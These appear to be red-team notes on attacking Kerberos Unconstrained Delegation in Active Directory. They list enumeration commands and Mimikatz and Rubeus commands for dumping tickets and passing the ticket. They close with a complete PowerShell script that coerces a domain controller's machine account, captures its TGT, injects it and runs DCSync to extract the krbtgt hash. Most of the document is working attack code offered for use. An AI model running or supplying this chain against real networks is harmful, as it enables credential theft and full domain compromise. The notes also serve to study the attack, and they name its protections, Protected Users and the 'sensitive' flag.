Kerberos Unconstrained Delegation (KUD): when an account authenticates to a service on a machine that is Trusted for Delegation, a copy of its TGT is sent along with the service ticket and cached in the LSASS process of that machine. Attacking KUD is therefore about having (or forcing) the right timing to pull that TGT out of LSASS on the service machine that has KUD enabled.
Every step below requires local admin rights (LSASS access) on the Trusted for Delegation machine.
Enumerate computers with unconstrained delegation (domain controllers have it by default, so the interesting hits are member servers; user accounts can carry the flag too and can be checked the same way with Get-ADUser):
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation,ServicePrincipalName,Description
If the target account has already authenticated to the KUD host, its TGT is still sitting in LSASS: dump the tickets from memory and pass the extracted ticket.
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
Invoke-Mimikatz -Command '"kerberos::ptt <path to .kirbi file>"'
If the account has not authenticated yet, run Rubeus on the KUD host (from an elevated context) in monitor mode to capture the account's TGT the moment it authenticates to the service; with /nowrap the base64 ticket is printed on a single line and can be injected with Rubeus ptt.
Rubeus.exe monitor /targetuser:<SamAccountName> /interval:5 /nowrap
Wait until the desired account authenticates to the resource, or coerce the authentication. Caveat: accounts in the Protected Users group, or flagged "Account is sensitive and cannot be delegated", do not forward their TGT, so nothing lands in LSASS for them.
Typical end state: coerce the Domain Controller machine account into authenticating to the KUD host, dump its TGT from memory, pass-the-ticket, and execute DCSync to get the krbtgt credential hash. This works because a DC machine account already holds the replication rights DCSync requires.
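The whole chain above as one PowerShell script, added here as an example (it is not part of the original notes). Assumptions: the RSAT ActiveDirectory module on the operator box for the enumeration step; Rubeus.exe and Invoke-Mimikatz.ps1 staged on the KUD host and run from an elevated shell there; SpoolSample.exe as a stand-in coercion tool (any coercion primitive works); the monitor output format (a "Base64EncodedTicket :" line followed by the ticket on the next non-empty line) is assumed; the names DC01, WEB01 and lab.local are made up.

```powershell
# Added example, not from the original notes. See lead-in for assumptions.
param(
    [string]$KudHost       = 'WEB01',     # Trusted for Delegation member server we control
    [string]$TargetUser    = 'DC01$',     # machine account whose TGT we want
    [string]$Domain        = 'lab.local',
    [int]   $ListenSeconds = 120
)

# 1. Enumerate unconstrained delegation (run on the operator box). DCs have it by default,
#    so filter them out; user accounts can carry the flag too.
function Get-KudTargets {
    Import-Module ActiveDirectory
    $dcNames   = (Get-ADDomainController -Filter *).Name
    $computers = Get-ADComputer -Filter { TrustedForDelegation -eq $true } `
        -Properties TrustedForDelegation, ServicePrincipalName, Description |
        Where-Object { $dcNames -notcontains $_.Name }
    $users     = Get-ADUser -Filter { TrustedForDelegation -eq $true } `
        -Properties TrustedForDelegation, ServicePrincipalName
    [PSCustomObject]@{ Computers = $computers; Users = $users }
}

# 2. Start Rubeus in monitor mode for a bounded time, stdout captured to a file.
#    /targetuser filters to the account we want; /nowrap keeps the base64 on one line.
function Start-TgtMonitor {
    param([string]$User, [int]$Seconds, [string]$OutFile)
    Start-Process -FilePath '.\Rubeus.exe' `
        -ArgumentList "monitor /targetuser:$User /interval:5 /runfor:$Seconds /nowrap" `
        -RedirectStandardOutput $OutFile -NoNewWindow -PassThru
}

# 3. Coerce the target into authenticating to the KUD host; its TGT rides along in the
#    service ticket and lands in LSASS here. SpoolSample is an assumed stand-in tool.
function Invoke-Coercion {
    param([string]$Target, [string]$Listener)
    & .\SpoolSample.exe $Target $Listener
}

# 4. Pull the last captured base64 ticket out of the monitor output
#    (assumed format: "Base64EncodedTicket :" then the ticket on the next non-empty line).
function Get-CapturedTicket {
    param([string]$OutFile)
    $lines  = Get-Content $OutFile
    $ticket = $null
    for ($i = 0; $i -lt $lines.Count; $i++) {
        if ($lines[$i] -match '^\s*Base64EncodedTicket') {
            $j = $i + 1
            while ($j -lt $lines.Count -and $lines[$j].Trim() -eq '') { $j++ }
            if ($j -lt $lines.Count) { $ticket = $lines[$j].Trim() }
        }
    }
    return $ticket
}

# 5. Inject the ticket into the current logon session and DCSync with it. A DC machine
#    account holds the replication rights DCSync needs, so DC01$'s TGT is enough for krbtgt.
function Invoke-PttDcsync {
    param([string]$Ticket, [string]$Domain)
    & .\Rubeus.exe ptt /ticket:$Ticket
    klist                                        # sanity check: the DC01$ TGT should be listed
    . .\Invoke-Mimikatz.ps1
    Invoke-Mimikatz -Command ('"lsadump::dcsync /domain:{0} /user:krbtgt"' -f $Domain)
}

# Run steps 2-5 on the KUD host (step 1 is Get-KudTargets, run from the operator box).
$out  = Join-Path $env:TEMP 'monitor.txt'
$proc = Start-TgtMonitor -User $TargetUser -Seconds $ListenSeconds -OutFile $out
Start-Sleep -Seconds 5                           # let the monitor settle before coercing
Invoke-Coercion -Target $TargetUser.TrimEnd('$') -Listener $KudHost
$proc.WaitForExit()
$tgt = Get-CapturedTicket -OutFile $out
if (-not $tgt) { throw "no TGT captured for $TargetUser within $ListenSeconds s" }
Invoke-PttDcsync -Ticket $tgt -Domain $Domain
```

The monitor is bounded with /runfor so the script cannot hang forever if the coercion fails or the target is protected (Protected Users, "sensitive" flag); in that case Get-CapturedTicket returns nothing and the script stops before trying to pass an empty ticket.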